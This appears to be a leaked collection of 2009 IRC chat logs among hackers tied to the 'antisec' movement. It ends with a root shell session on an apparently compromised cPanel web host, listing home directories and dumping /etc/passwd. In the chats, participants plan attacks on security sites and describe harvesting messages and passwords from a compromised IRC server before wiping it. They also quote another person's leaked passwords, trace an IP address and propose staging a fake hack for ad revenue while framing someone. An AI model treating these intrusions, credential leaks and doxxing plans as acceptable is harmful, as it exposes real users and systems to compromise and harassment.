+17:41 (RoMeO) i hate CS
+17:41 (Dark) Shoulda known
+17:41 (Dark) Same
+17:41 (RoMeO) too broad
+17:41 (Dark) Fucking Linguistics + Econ for great justice
+17:41 (RoMeO) java is gay
+17:42 (Dark) To be honest, I haven't seen alot of the oldschool people for a really long time
+17:42 (RoMeO) yeah
+17:42 (Dark) Theres a few left here and there
+17:42 (RoMeO) everyone gets busy for some time
+17:42 (Dark) I wish they'd pop up
+17:42 (RoMeO) but they all come back eventually
+17:42 (Dark) I guess making a new antisec is where its gotta be
+17:42 (RoMeO) i hope anyways
+17:43 (Dark) I think defcon should go over well
+17:43 (RoMeO) yes, new movement and just wait for people to join from diff communities
+17:43 (Dark) After that
+17:43 (Dark) As I see it
+17:43 (Dark) Its all out war
+17:43 (RoMeO) rawr
+17:43 (Dark) So start saving your exploits nao
+17:43 (RoMeO) hidden in sekret boxen ;O
+17:44 (Dark) For sure
+17:44 (RoMeO) lcirc is being monitored now
+17:44 (RoMeO) they host  #milw0rm and #bottalk
+17:44 (Dark) Probably
+17:45 (RoMeO) no like. i know for sure
+17:45 (Dark) Monitored by pr0jekt types, or by the feds?
+17:45 (RoMeO) pr0ject types
+17:45 (Dark) I figured as much
+17:45 (RoMeO) and feds ofcourse, but pr0ject types got the root shell
+17:46 (Dark) You know what the intentions are?
+17:46 (RoMeO) take down after exposure
+17:46 (RoMeO) intel, private messages, passwords, mail spools, then rm -rf
+17:46 (Dark) can't say I've ever really been to lcirc
+17:46 (RoMeO) should get them all to stop
+17:47 (Dark) Owning milw0rm is a reasonable priority
+17:47 (Dark) As well as Secfocus of course
+17:47 (RoMeO) it is in the right hands
+17:47 (RoMeO) :]
+17:47 (Dark) I've been trying to go rogue on some stuff
+17:47 (Dark) I'm not part of any group per se now that
+17:48 (RoMeO) neither ami
+17:48 (RoMeO) doing it on my own
+17:48 (RoMeO) i function better solo
+--- Log closed Thu Jun 18 18:07:45 2009
+
+--- Log opened Fri Jun 19 09:07:17 2009
+09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] back
+09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] are you excited about leaving?
+09:09 -pand!- Irssi: Starting query in secchat with BSDGurl
+09:09 (RoMeO) well yea ;D
+09:10 (BSDGurl) i was reading the logs this morning and like
+09:11 (BSDGurl) i have to tell romeo good luck and to be safe etc before he leaves
+09:11 (BSDGurl) i know you will have Internet but still
+09:11 (RoMeO) :)
+09:11 (RoMeO) thxthx
+09:11 (BSDGurl) it's kind of scary
+09:12 (BSDGurl) i was scared to start uni here
+09:12 (RoMeO) thats why i moved bounces this week, i will be idle here 24/7 and read logs / messsages at night / whenver i can get online
+09:12 (BSDGurl) hahahaha
+09:12 (RoMeO) lawl, i am excitted
+09:12 (BSDGurl) yes it was like a mix
+09:13 (RoMeO) yea it is a mix of being scared and excitted, but all good
+09:13 (BSDGurl) i hope you learn and are not bored
+09:13 (BSDGurl) do you have maths and things?
+09:13 (RoMeO) no thanks god
+09:13 (BSDGurl) yes
+09:14 (RoMeO) maths might be involved in a few chapters of the software engineeering, but all good
+09:14 (RoMeO) not like computer science for example, which is all around maths and java -_-
+09:14 (BSDGurl) hahahaa java
+09:14 (RoMeO) yea...
+09:14 (BSDGurl) you know i don't hate java
+09:14 (BSDGurl) it's just all those guys
+09:14 (RoMeO) i hate it cause of what i hear from those people
+09:14 (BSDGurl) they ride the nuts
+09:14 (BSDGurl) so hard
+09:14 (RoMeO) lmao
+09:14 (BSDGurl) it's like
+09:14 (BSDGurl) funny
+09:15 (BSDGurl) i can't help it
+09:15 (RoMeO) this friend of mine in uni now
+09:15 (RoMeO) his CS teacher walks in the room daily
+09:15 (RoMeO) and screams
+09:15 (RoMeO) JAVA IS THE FUTURE
+09:15 (RoMeO) :|
+09:15 (BSDGurl) rofl
+09:15 (RoMeO) true story
+09:15 (BSDGurl) they all do
+09:15 (BSDGurl) hahahaha
+09:15 (RoMeO) thats scary lol
+09:15 (BSDGurl) i know
+09:15 (RoMeO) how could java be possibly the future
+09:16 (RoMeO) possibly be*
+09:16 (BSDGurl) that's why i can't help but just say things to piss them off
+09:16 (BSDGurl) i don't even care
+09:16 (RoMeO) every lang got its use, kthxbai
+09:16 (BSDGurl) i am like no
+09:16 (BSDGurl) i don't even know java
+09:16 (RoMeO) me too lmao
+09:16 (BSDGurl) it maybe the future for all i know
+09:16 (BSDGurl) hahaha
+09:16 (RoMeO) future of wat xD
+09:16 (BSDGurl) i just imagine them all pissed off
+09:16 (RoMeO) lmao
+09:16 (RoMeO) 'oh shit'
+09:17 (BSDGurl) i went to rootsecurity the other night to see what was going on
+09:18 (RoMeO) gay
+09:18 (BSDGurl) cos this place is so dea
+09:18 (BSDGurl) d
+09:18 (BSDGurl) of course it was like
+09:18 (BSDGurl) you are some pic
+09:18 (BSDGurl) or this or that
+09:18 (RoMeO) lol wow
+09:18 (BSDGurl) i swear i can't go anywhere
+09:18 (RoMeO) ;(
+09:18 (RoMeO) - /nick BSDBoi
+09:18 (BSDGurl) haha
+09:18 (RoMeO) lolol
+09:19 (BSDGurl) i don't understand i
+09:19 (BSDGurl) t
+09:19 (RoMeO) its internet
+09:19 (BSDGurl) you know the big deal
+09:19 (BSDGurl) oh and the guy
+09:19 (BSDGurl) the one you banned that asked me if i was nell
+09:19 (RoMeO) lol yea
+09:19 (BSDGurl) he joined bhf and said
+09:19 (BSDGurl) this chan is for fags
+09:20 (BSDGurl) then left
+09:20 (BSDGurl) rofl
+09:20 (RoMeO) ;O
+09:20 (RoMeO) he gots issues
+09:20 (BSDGurl) so you know i am expecting people to say
+09:20 (BSDGurl) bsdgurl this is you
+09:20 (BSDGurl) and show me someone named nell now
+09:20 (BSDGurl) hahaha
+09:20 (RoMeO) xD
+09:20 (RoMeO) 'i had you on myspace'
+09:20 (RoMeO) wat
+09:20 (RoMeO) .
+09:21 (BSDGurl) i know
+09:21 (BSDGurl) god  being on that site
+09:21 (BSDGurl) i was years ago
+09:21 (RoMeO) facebook is nice ;p 
+
+// http://www.facebook.com/profile.php?id=1119054258 :)
+
+09:21 (BSDGurl) like i haven't been for at least 2
+09:21 (BSDGurl) no lie
+09:21 (BSDGurl) i wouldn't lie i still have all the flash profiles i made etc
+09:22 (RoMeO) haha
+09:22 (BSDGurl) you know because you could custom it
+09:22 (RoMeO) yeah
+09:22 (RoMeO) not a myspace fan
+09:22 (RoMeO) tho
+09:22 (BSDGurl) me either now
+09:22 (RoMeO) facebook is simple and good
+09:22 (BSDGurl) i have an account
+09:22 (BSDGurl) it's fake
+09:23 (RoMeO) lol i hae a fake account with my public email there
+09:23 (BSDGurl) last log in was december i think
+09:23 (RoMeO) and i lol when people join dmz to tell me
+09:23 (RoMeO) 'hello john genter'
+09:23 (RoMeO) cause the name there is john genter
+09:23 (RoMeO) lmfao
+09:23 (BSDGurl) rofl
+09:23 (BSDGurl) i hate that myspace shit though
+09:23 (BSDGurl) seriously
+09:24 (RoMeO) yeah
+09:24 (BSDGurl) so yeah i am nell
+09:24 (BSDGurl) haha
+09:24 (RoMeO) hai nell
+09:24 (RoMeO) xD
+09:24 (RoMeO) http://www.nellmcandrew.tv/
+09:24 (BSDGurl) i am curious to see if meathive stays
+09:24 (RoMeO) i lol'd
+09:25 (BSDGurl) last night he was really pissed at asta
+09:25 (RoMeO) yea i saw
+09:25 (BSDGurl) i told him you know the servers aren't related
+09:25 (BSDGurl) but i don't think he believed me
+09:25 (RoMeO) what servers 
+09:26 (RoMeO) irc and web?
+09:26 (BSDGurl) they irc
+09:26 (BSDGurl) the
+09:26 (RoMeO) yeah
+09:26 (RoMeO) its ok lol
+09:26 (BSDGurl) i didn't want to like go into with him
+09:27 (BSDGurl) i was just like do what you think is best:/
+09:27 (BSDGurl) i didn't know what to say
+09:27 (RoMeO) haha, what is he doing anyways
+09:27 (RoMeO) i just saw a rant
+09:27 (BSDGurl) i know
+09:27 (BSDGurl) i don't know what
+09:28 (RoMeO) i think people should move on already
+09:28 (BSDGurl) Me TOO
+09:28 (RoMeO) lol!
+09:28 (BSDGurl) thank you
+09:28 (RoMeO) sites get hacked all the time
+09:28 (BSDGurl) you know what i said
+09:28 (BSDGurl) think about this
+09:28 (BSDGurl) you know if you staged
+09:28 (BSDGurl) that
+09:29 (BSDGurl) and threw those ads
+09:29 (BSDGurl) back up
+09:29 (RoMeO) stunt
+09:29 (BSDGurl) you would make bank 
+09:29 (RoMeO) yes.
+09:29 (BSDGurl) :)
+09:29 (RoMeO) everyone checks asta now to see whats new in the 'hack'
+09:29 (RoMeO) lolol
+09:29 (BSDGurl) yes
+09:29 (BSDGurl) think about that
+09:29 (RoMeO) it got more backlinmks than google over night
+09:29 (BSDGurl) membership down
+09:30 (BSDGurl) etc
+09:30 (BSDGurl) now look
+09:30 (BSDGurl) cash in
+09:30 (BSDGurl) think about it for darkmindz too
+09:30 (BSDGurl) hahaha
+09:30 (RoMeO) lmfao
+09:30 (RoMeO) 'HACKED AND EXPOSED'
+09:30 (BSDGurl) pwn xlink
+09:31  -> BSDGurl dies
+09:31 (RoMeO) and put all kinda ads on there, and blame the hacker
+09:31 (BSDGurl) yes
+09:31 (RoMeO) fun
+09:31 (RoMeO) if i ever need money in uni, thats plan A
+09:31 (BSDGurl) biber can be fall guy
+09:31 (BSDGurl) hahaha
+09:31 (RoMeO) ^^
+09:32 (BSDGurl) let me go back to art shit
+09:32 (RoMeO) oh enjoy
+09:32 (BSDGurl) i just wanted to tell you have a safe trip
+09:33 (RoMeO) thank you <3
+09:33 (BSDGurl) if i didnt get to talk
+09:33 (RoMeO) ^_^
+09:33 (BSDGurl) <3 you are very welcome
+--- Log closed Fri Jun 19 09:34:04 2009
+
+--- Log opened Sun Jun 21 09:24:55 2009
+09:24 [{Glyph_Home}(~glyph@mods.govsec.org)] btw, unless it's been you whacking GSO, the technique is becoming widespread.
+09:25 -INFO- Irssi: Starting query in bhf with {Glyph_Home}
+09:25 (RoMeO) mm?
+09:28 (RoMeO) what are you talking about lol
+09:29 ({Glyph_Home}) GSO has had issues this past week.
+09:29 ({Glyph_Home}) I thought perhaps you were the reason.
+09:29 (RoMeO) because  rsnake released a DoS tool
+09:29 (RoMeO) nope
+09:29 ({Glyph_Home}) No.. the litespeed issue
+09:29 (RoMeO) my issues dont go on lagging web servers
+09:30 ({Glyph_Home}) Though I have no idea why you'd nail GSO
+09:30 ({Glyph_Home}) Doesn't seem to be your 'venue'
+09:30 (RoMeO) that too
+09:31 ({Glyph_Home}) I've already talked with Edu and WebDevil..
+09:31 (RoMeO) about
+09:31 ({Glyph_Home}) Gonna make my  'recommends' to the admins this week.
+09:31 (RoMeO) i find it funny how staff at 'black hat forums'  get to be staff at ' gov sec' 
+09:32 ({Glyph_Home}) Quesion: Any tips on 'mitigating' the /g0troot issue?
+09:32  -> {Glyph_Home} chuckles
+09:32 ({Glyph_Home}) Not exactly a 'whitehat' myself.
+09:32 (RoMeO) lolol
+09:32 ({Glyph_Home}) I just don't 'participate' in the darkside anymore.
+09:33 (RoMeO) just keep the site clean, didnt see gso being mentioned anywhere as a target, ever
+09:33 (RoMeO) so all good
+09:33 ({Glyph_Home}) Used to..
+
+09:33 (RoMeO) but people who are going down soon are botnet communities for example 
+09:34 ({Glyph_Home}) hmmm... Sounds like a shadowserver operation.
+09:34 (RoMeO) just cleaning the net
+09:34 ({Glyph_Home}) Straight out of the 'toyshop'
+09:34 (RoMeO) :]
+09:35 ({Glyph_Home}) Antisec is beginning to sound more like 'cybercops' 
+09:36 (RoMeO) haha
+
+09:36 (RoMeO) wont be done under antisec 
+09:36 (RoMeO) antisec is kept for 'security' issues 
+09:36 (RoMeO) this is, botnet and skids crap
+
+09:36 ({Glyph_Home}) hmmm... 
+09:37 ({Glyph_Home}) IFF I can be of assistance, without endangering current position, I offer my not so hot skill sets.
+09:37 (RoMeO) all good so far
+09:37 (RoMeO) lcirc and indoirc got comprimised
+09:37 (RoMeO) the 2 largest botnet and ccpower ircd's
+09:38 ({Glyph_Home}) w00f
+09:38 (RoMeO) ;)
+09:38 ({Glyph_Home}) Might be an idea for the info to make it back to the ccproviders.. discretely and anonymously of course.
+09:38 (RoMeO) well
+09:38 (RoMeO) the idea is
+09:39 (RoMeO) to release all intel and ip's on the people who started those channels / irc's
+09:39 (RoMeO) out in the public and all over the net
+09:39 (RoMeO) let the authorities deal with that
+09:39 ({Glyph_Home}) roflmao
+09:39 (RoMeO) :]
+09:39 (RoMeO) brb
+--- Log closed Sun Jun 21 09:44:31 2009
+
+
+--- Log opened Mon Jun 22 16:15:04 2009
+16:15 (Glyph) ?
+16:15 (Glyph) Oh.. that stuff
+16:15 (Glyph) Old stuff.. was playing more or less.
+16:16 (Glyph) Course my 'playtime' tends to lead to profitability ;)
+16:16 (Glyph) All that is at least five years old or older.
+16:16 (Glyph) circa 2005
+16:17 (RoMeO) yeah
+16:17 (RoMeO) thinking of setting up a box for dark
+16:17 (RoMeO) see what is he going to do
+16:17 (RoMeO) ofcourse everything will be patched to log in's and out's // HOOKIN.. HOOKOUT.. 
+16:18 (Glyph) Well you know the saying.. friends close, enemies closer ;)
+16:18 (RoMeO) yeah
+16:18 (RoMeO) sure do
+16:18 (Glyph) Can't believe spike threw error's like that, and that's what he recommended?
+16:18 (RoMeO) lol
+16:19 (RoMeO) thats why i want to see what is he goign to do on a box
+16:19 (RoMeO) anyone can talk
+16:19 (RoMeO) specially on the internet
+16:19 (Glyph) I'm beginning to think he 'talk's a good game'..
+16:19 (Glyph) snap!
+16:19 (RoMeO) :P
+16:19 (RoMeO) thats what i heared from everyone so far
+16:19 (RoMeO) i will even give him a none chrooted shell
+16:19 (Glyph) Have you lost your mind?
+16:19 (RoMeO) lol
+16:19 (Glyph) Damn if I'd trust him that far.
+16:20 (RoMeO) it will be an empty box
+16:20 (Glyph) jailed, maybe.. unjailed never.
+16:20 (RoMeO) and every shell is modified to log to a remote system
+16:20 (Glyph) Now yer sounding like me.
+16:20 (RoMeO) i will sit there wth a cop of tea and tail -f
+16:21 (Glyph) tail -f firewall | grep 'insert key phrase of the day here' 
+16:28 (RoMeO) reading stories about knuth
+16:28 (RoMeO) how to own a continent for example
+16:28 (RoMeO) that one is amazing
+16:29 (Glyph) It's NOT hard.
+16:29 (RoMeO) if you didnt read it, you should
+16:38 (RoMeO) i was looking around dark for a while
+16:38 (RoMeO) and what surprised me is
+16:38 (RoMeO) his really low-quality passwords
+16:38 (RoMeO) like
+16:38 (RoMeO) 123123
+16:38 (RoMeO) or 123pass
+16:38 (RoMeO) etc
+16:38 (RoMeO) made me go ?
+16:39 (Glyph) almost as bad as qwerty12345
+16:39 (RoMeO) yes
+16:40 (RoMeO) just one more thing that shows he is talk-only
+16:40 (RoMeO) okay he can argue that he doesnt 'reuse passwords'  but using really weak passwords -does- mean something
+16:40 (Glyph) worse yet.. he could be a c&p
+16:40 (RoMeO) that would be so bad
+16:43 (Glyph) Yeah.. it would.
+16:44 (Glyph) Actually, I sometimes think you and he are one in same and are playing 'mindfuck' with me.
+16:44 (RoMeO) hahaa
+16:44 (RoMeO) why would we tho
+16:45 (Glyph) Because you were bored with the brainless fucks we normally encounter.
+16:46 (RoMeO) when that happens i just log on a shell and explore ;p
+16:46 (RoMeO) one more thing
+16:46 (RoMeO) dark is a yahoo user
+16:46 (RoMeO) that counts 
+16:47 (RoMeO) thats -100 sec points
+16:47 (RoMeO) i do tag people by there email s too
+16:47 (RoMeO) for example
+16:47 (RoMeO) yahoo users,  mostly newbies / females
+16:48 (RoMeO) hotmail users, same thing but a higher level a small higher level
+16:48 (RoMeO) gmail users are on top and above that comes the people with there own mail servers 
+16:48 (RoMeO) its alot deeper than that, but thats just a quick explanation :P
+16:50 (RoMeO) found 2 passwords of dark in my db
+16:50 (RoMeO) and they both fail
+16:50 (RoMeO) hellohello is one of them -_-'
+--- Log closed Mon Jun 22 16:55:25 2009
+
+--- Log opened Tue Jun 23 17:19:55 2009
+17:19 (Glyph) ?
+17:20 (RoMeO) 15:23:42 (Glyph) Apache/2.2.11 (FreeBSD)
+17:20 (RoMeO) 15:24:33 (Glyph) Johnny_Demonik
+17:20 (RoMeO) 15:27:48 (Glyph) ERROR: Database error.
+17:20 (Glyph) Ahhh...
+17:21 (Glyph) He came up out of 64.127.41.18
+17:22 (RoMeO) ah
+17:22 (Glyph) That ip is apparently a 'shell' anyhow there's port 9050 on it.
+17:22 (Glyph) But it goes back to WestVirginia..
+17:22 (RoMeO) yeah
+17:23 (Glyph) Firm called Compucrash
+17:23 (Glyph) Their webserver is at .3 of that range.
+17:23 (RoMeO) alrit, lets just hope he comes back here, busy with another hack ;p
+17:23 (Glyph) So silly me, I tried to access their ircd thru their webpage.
+17:23 (RoMeO) lol
+17:24 (Glyph) That's when the MySQL threw the error code at me.
+17:24 (Glyph) Then I checked the forums.
+17:24 (Glyph) You wouldn't believe it.. PHPBB3
+17:24 (Glyph) Pr0nsters have already been at it.
+17:24 (RoMeO) lmao
+17:24 (RoMeO) yea
+17:25 (RoMeO) i saw that one
+17:25 (Glyph) Not heavily.. but that's prolly because it's 'under the radar'
+17:25 (Glyph) Plus the bw is pricey as heck.
+17:26 (Glyph) I'm heading home..
+17:26 (Glyph) You have a good un.
+17:26 (RoMeO) thanks
+17:26 (RoMeO) enjoy
+--- Log closed Tue Jun 23 17:31:25 2009
+
+--- Log opened Wed Jun 24 17:11:08 2009
+17:11 [Glyph(Glyph@mods.govsec.org)] http://74.125.47.132/search?q=cache:jdsSh2XXmQAJ:www.fcc.gov/mb/engineering/2008_PSIDs_form325.xls+%22MetroCast+Communications+of+Mississippi%22&cd=12&hl=en&ct=clnk&gl=us
+--- Log closed Wed Jun 24 17:16:42 2009
+
+--- Log opened Sat Jun 27 23:05:38 2009
+23:09 8/[g    <\  \_/   \/    ^   /
+ \_____  /__/\_ \\_____  /\____   | 
+       \/      \/      \/      |__| 
+      .__  __         .__                                   .___                             
+___  _|__|/  |______  |  |   ____________   ____   ____   __| _/______ 
+\  \/ /  \   __\__  \ |  |  /  ___/\____ \_/ __ \_/ __ \ / __ |/  ___/ 
+ \   /|  ||  |  / __ \|  |__\___ \ |  |_> >  ___/\  ___// /_/ |\___ \  
+  \_/ |__||__| (____  /____/____  >|   __/ \___  >\___  >____ /____  > 
+                    \/          \/ |__|        \/     \/     \/    \/  
+          __________                _________              
+          \______   \_______  ____ /   _____/ ____   ____  
+  ______   |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
+ /_____/   |    |     |  | \(  <_> )        \  ___/\  \___ 
+           |____|     |__|   \____/_______  /\___  >\___  >
+                                          \/     \/     \/ 
+
+root@light [/]# hostname
+light.co1.org
+root@light [/]# uname -a
+Linux light.co1.org 2.6.17.5-HN-2.3-P4 #1 SMP Sat Jul 15 09:55:04 EDT 2006 i686 i686 i386 GNU/Linux
+root@light [/]# date
+Tue Jun 23 20:06:26 EDT 2009
+root@light [/]# cd /home
+root@light [/home]# ls
+./            blndbill/       .cpcpan/        deevour/   group88/   joshd/     lost+found/     nglgorg/     r00t/      timc/
+../           blueacre/       cpeasyapache/   denial/    hadrys/    karbassi/  mapmap/         nickg/       radical/   timc14/
+amp3dne/      bziem/          cprestore/      digital/   handknit/  kcole/     maraka/         noct/        rannman/   tmp/
+animal/       cache/          cpzendinstall/  drireign/  harry3/    kidc/      mrwoot/         nycrob/      raven/     tradefx/
+apadana/      cawn/           craig/          edgein/    hasting/   knokes/    msupike/        olliee/      robotey/   untitled/
+aquota.user*  cfurn/          ctcped/         fran459/   hastings/  kozmo/     munin/          pioneer/     russ43/    values/
+army/         charice/        curator/        func88/    ircmilw/   kujio/     MySQL-install/  plumcree/    sheik/     vincent/
+auxone/       chemmer/        daelenbe/       futonre/   jamesj/    kyle/      national/       porch46/     starr/     virtfs/
+badassb/      christa/        danielc/        fxarbitr/  jb007/     lakeshor/  neptunes/       prime/       stopcand/  vitus/
+bebe/         cmilone/        ddosmyi/        ganja/     jeffhem/   light/     netdevil/       psurge/      sub/       wrench/
+berkel/       .cpan/          dear/           ganja51/   jer1h/     lithium/   netenberg/      qstud/       syscrash/  yasha/
+billing/      cpapachebuild/  decalsby/       greg93/    jkaiser/   lost/      nglgnet/        quota.user*  tickah/
+root@light [/home]# 
+
+root@light [/home]# cat /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+news:x:9:13:news:/etc/news:
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+rpm:x:37:37::/var/lib/rpm:/sbin/nologin
+haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
+netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
+nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
+rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
+pcap:x:77:77::/var/arpwatch:/sbin/nologin
+xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
+named:x:25:25:Named:/var/named:/sbin/nologin
+mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
+mailman:x:32001:32001::/usr/local/cpanel/3rdparty/mailman:/bin/bash
+cpanel:x:32002:32003::/usr/local/cpanel:/bin/bash
+amp3dne:x:32005:32006::/home/amp3dne:/usr/local/cpanel/bin/noshell
+auxone:x:32006:32007::/home/auxone:/bin/false
+badassb:x:32007:32008::/home/badassb:/usr/local/cpanel/bin/noshell
+cache:x:32011:32012::/home/cache:/usr/local/cpanel/bin/noshell
+cawn:x:32012:32013::/home/cawn:/bin/false
+cfurn:x:32013:32014::/home/cfurn:/bin/false
+cmilone:x:32016:32017::/home/cmilone:/usr/local/cpanel/bin/noshell
+craig:x:32017:32018::/home/craig:/usr/local/cpanel/bin/noshell
+dear:x:32021:32022::/home/dear:/bin/false
+drireign:x:32024:32025::/home/drireign:/usr/local/cpanel/bin/noshell
+fran459:x:32028:32029::/home/fran459:/usr/local/cpanel/bin/noshell
+futonre:x:32030:32031::/home/futonre:/usr/local/cpanel/bin/noshell
+greg93:x:32031:32032::/home/greg93:/usr/local/cpanel/bin/noshell
+harry3:x:32034:32035::/home/harry3:/usr/local/cpanel/bin/noshell
+jkaiser:x:32039:32040::/home/jkaiser:/usr/local/cpanel/bin/noshell
+joshd:x:32040:32041::/home/joshd:/bin/false
+kcole:x:32041:32042::/home/kcole:/usr/local/cpanel/bin/noshell
+kidc:x:32042:32043::/home/kidc:/usr/local/cpanel/bin/noshell
+kozmo:x:32043:32044::/home/kozmo:/usr/local/cpanel/bin/noshell
+light:x:32047:32048::/home/light:/usr/local/cpanel/bin/noshell
+lost:x:32049:32050::/home/lost:/usr/local/cpanel/bin/noshell
+msupike:x:32057:32058::/home/msupike:/usr/local/cpanel/bin/noshell
+neptunes:x:32058:32059::/home/neptunes:/bin/sh
+nickg:x:32060:32061::/home/nickg:/usr/local/cpanel/bin/noshell
+olliee:x:32061:32062::/home/olliee:/usr/local/cpanel/bin/noshell
+pioneer:x:32063:32064::/home/pioneer:/usr/local/cpanel/bin/noshell
+plumcree:x:32064:32065::/home/plumcree:/usr/local/cpanel/bin/noshell
+porch46:x:32065:32066::/home/porch46:/usr/local/cpanel/bin/noshell
+qstud:x:32066:32067::/home/qstud:/usr/local/cpanel/bin/noshell
+rannman:x:32068:32069::/home/rannman:/usr/local/cpanel/bin/noshell
+sheik:x:32079:32080::/home/sheik:/usr/local/cpanel/bin/noshell
+starr:x:32081:32082::/home/starr:/usr/local/cpanel/bin/noshell
+stopcand:x:32083:32084::/home/stopcand:/usr/local/cpanel/bin/noshell
+timc14:x:32089:32090::/home/timc14:/usr/local/cpanel/bin/noshell
+values:x:32090:32091::/home/values:/bin/sh
+vitus:x:32091:32092::/home/vitus:/usr/local/cpanel/bin/noshell
+yasha:x:32099:32100::/home/yasha:/usr/local/cpanel/bin/noshell
+tickah:x:32103:32104::/home/tickah:/usr/local/cpanel/bin/noshell
+charice:x:32106:32107::/home/charice:/bin/false
+animal:x:32109:32110::/home/animal:/usr/local/cpanel/bin/noshell
+ganja51:x:32110:32111::/home/ganja51:/bin/false
+ganja:x:32111:32112::/home/ganja:/usr/local/cpanel/bin/noshell
+mrwoot:x:32113:32114::/home/mrwoot:/usr/local/cpanel/bin/noshell
+karbassi:x:32114:32115::/home/karbassi:/usr/local/cpanel/bin/noshell
+nycrob:x:32115:32116::/home/nycrob:/bin/false
+radical:x:32118:32119::/home/radical:/usr/local/cpanel/bin/noshell
+jer1h:x:32119:32120::/home/jer1h:/bin/false
+denial:x:32121:32122::/home/denial:/usr/local/cpanel/bin/noshell
+jamesj:x:32123:32124::/home/jamesj:/usr/local/cpanel/bin/noshell
+nglgnet:x:32124:32125::/home/nglgnet:/usr/local/cpanel/bin/noshell
+nglgorg:x:32125:32126::/home/nglgorg:/usr/local/cpanel/bin/noshell
+russ43:x:32126:32128::/home/russ43:/usr/local/cpanel/bin/noshell
+berkel:x:32127:32129::/home/berkel:/usr/local/cpanel/bin/noshell
+hastings:x:32128:32130::/home/hastings:/usr/local/cpanel/bin/noshell
+knokes:x:32129:32131::/home/knokes:/usr/local/cpanel/bin/noshell
+decalsby:x:32132:32134::/home/decalsby:/usr/local/cpanel/bin/noshell
+lakeshor:x:32134:32136::/home/lakeshor:/usr/local/cpanel/bin/noshell
+army:x:32136:32138::/home/army:/bin/false
+curator:x:32138:32140::/home/curator:/bin/false
+tradefx:x:32142:32144::/home/tradefx:/usr/local/cpanel/bin/noshell
+national:x:32146:32148::/home/national:/usr/local/cpanel/bin/jailshell
+robotey:x:32147:32149::/home/robotey:/bin/false
+vincent:x:32148:32150::/home/vincent:/usr/local/cpanel/bin/noshell
+psurge:x:32149:32151::/home/psurge:/usr/local/cpanel/bin/noshell
+prime:x:32150:32152::/home/prime:/bin/false
+digital:x:32151:32153::/home/digital:/usr/local/cpanel/bin/noshell
+ddosmyi:x:32153:32155::/home/ddosmyi:/usr/local/cpanel/bin/noshell
+blueacre:x:32155:32157::/home/blueacre:/usr/local/cpanel/bin/noshell
+kujio:x:32157:32159::/home/kujio:/bin/false
+untitled:x:32158:32160::/home/untitled:/usr/local/cpanel/bin/noshell
+danielc:x:32159:32161::/home/danielc:/bin/false
+billing:x:32163:32165::/home/billing:/usr/local/cpanel/bin/jailshell
+syscrash:x:32164:32166::/home/syscrash:/usr/local/cpanel/bin/jailshell
+hasting:x:32165:32167::/home/hasting:/usr/local/cpanel/bin/noshell
+wrench:x:32166:32168::/home/wrench:/usr/local/cpanel/bin/noshell
+apadana:x:32167:32169::/home/apadana:/usr/local/cpanel/bin/noshell
+ircmilw:x:32169:32171::/home/ircmilw:/usr/local/cpanel/bin/noshell
+blndbill:x:32170:32172::/home/blndbill:/usr/local/cpanel/bin/noshell
+edgein:x:32171:32173::/home/edgein:/usr/local/cpanel/bin/noshell
+hadrys:x:32172:32174::/home/hadrys:/usr/local/cpanel/bin/noshell
+bebe:x:32173:32175::/home/bebe:/usr/local/cpanel/bin/noshell
+mapmap:x:32176:32178::/home/mapmap:/usr/local/cpanel/bin/noshell
+cpanel-horde:x:32003:32004::/var/cpanel/userhomes/cpanel-horde:/usr/local/cpanel/bin/noshell
+cpanel-phpmyadmin:x:32008:32009::/var/cpanel/userhomes/cpanel-phpmyadmin:/usr/local/cpanel/bin/noshell
+cpanel-phppgadmin:x:32009:32010::/var/cpanel/userhomes/cpanel-phppgadmin:/usr/local/cpanel/bin/noshell
+kyle:x:32177:32179::/home/kyle:/bin/false
+ctcped:x:32178:32180::/home/ctcped:/usr/local/cpanel/bin/noshell
+fxarbitr:x:32179:32181::/home/fxarbitr:/usr/local/cpanel/bin/noshell
+func88:x:32180:32182::/home/func88:/bin/bash
+cpanelhorde:x:32010:32011::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
+cpanelphpmyadmin:x:32014:32015::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
+cpanelphppgadmin:x:32020:32021::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
+cpanelroundcube:x:32023:32024::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
+christa:x:32181:32183::/home/christa:/usr/local/cpanel/bin/noshell
+bziem:x:32182:32184::/home/bziem:/usr/local/cpanel/bin/noshell
